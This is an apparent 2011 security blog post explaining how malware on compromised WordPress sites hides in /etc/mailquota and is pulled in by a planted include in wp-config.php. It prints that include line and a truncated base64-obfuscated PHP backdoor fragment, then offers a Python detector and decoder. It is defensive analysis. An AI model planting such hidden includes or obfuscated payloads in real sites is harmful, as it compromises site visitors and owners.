The Latest in IT Security

Malware on /etc/mailquota

06 Oct 2011


We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users.

The webmaster (owner of the site) searches everywhere for malicious strings and can't find anything. Where can it be hidden?

It could be outside the root directory of your site. Many of the sites we analysed in the last few days had the following line in wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . "/../etc/mailquota");

Hum... It is including mailquota, which is not a PHP file. When you look at the file you get a long string of encoded PHP:

ncftp /etc > cat mailquota
<?$GLOBALS['_1562346450_']=Array(base64_decode('ZX' .'Jy' .'b3J' .'fc' .'mVwb3J0aW5' .'n'),base64_decode('cHJlZ19t' .'YXRj' .'aA' .'=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('c' .'HJlZ19tYX' .'Rja' .'A=='),base64_decode('Z2V0aG9z' .'dGJ5YWRk' .'cg==')); ..{$a=Array('QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=',

Once decoded, it does a bunch of nasty things (includes JavaScript malware, acts as a backdoor, etc.).
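The two things worth automating from this case are spotting an include that leaves the web root or pulls in a non-.php file, and re-joining the split base64 fragments to see which functions the blob resolves. The script below is an added example written for this post, not Sucuri's code; the wp-config.php and mailquota samples are constructed from the snippets above.

```python
import base64
import re

# Constructed sample: the include the post found in wp-config.php, next to a normal one
WP_CONFIG_SAMPLE = """<?php
define('DB_NAME', 'example');
require( ABSPATH . "/../etc/mailquota");
require_once(ABSPATH . 'wp-settings.php');
"""

# Constructed sample modelled on the head of the mailquota file shown in the post
MAILQUOTA_SAMPLE = ("<?$GLOBALS['_1562346450_']=Array(base64_decode('ZX' .'Jy' .'b3J' .'fc' "
                    ".'mVwb3J0aW5' .'n'),base64_decode('cHJlZ19t' .'YXRj' .'aA' .'=='),"
                    "base64_decode('Z2V0aG9z' .'dGJ5YWRk' .'cg=='));")

# require/include of ABSPATH . '<path>' in any of the usual spellings
INCLUDE_RE = re.compile(
    r"\b(?:require|include)(?:_once)?\s*\(?\s*ABSPATH\s*\.\s*['\"]([^'\"]+)['\"]")

def suspicious_includes(php_source):
    """Return paths included relative to ABSPATH that climb out of the web root
    ('..' as a path component) or do not end in .php, as /../etc/mailquota does."""
    hits = []
    for path in INCLUDE_RE.findall(php_source):
        if ".." in path.split("/") or not path.lower().endswith(".php"):
            hits.append(path)
    return hits

# One base64_decode(...) call whose argument is a chain of '...' fragments joined with '.'
B64_CALL_RE = re.compile(r"base64_decode\(\s*((?:'[^']*'\s*\.?\s*)+)\)")
FRAGMENT_RE = re.compile(r"'([^']*)'")

def decode_split_base64(php_source):
    """Re-join the split fragments ('ZX' .'Jy' ...) of each base64_decode()
    argument and decode them, revealing the function names the code resolves
    at run time (the obfuscation defeats a plain grep for those names)."""
    names = []
    for chain in B64_CALL_RE.findall(php_source):
        joined = "".join(FRAGMENT_RE.findall(chain))
        try:
            names.append(base64.b64decode(joined, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            names.append("<undecodable:%s>" % joined)
    return names

if __name__ == "__main__":
    print(suspicious_includes(WP_CONFIG_SAMPLE))    # ['/../etc/mailquota']
    print(decode_split_base64(MAILQUOTA_SAMPLE))   # ['error_reporting', 'preg_match', 'gethostbyaddr']
```

Point suspicious_includes at every PHP file the web user can read, not only wp-config.php, and treat any hit outside the docroot as a file to inspect by hand.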

The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).

Web site hacked? You think it is? Scan it here to double check: http://sitecheck.sucuri.net.
Need help cleaning up a site?
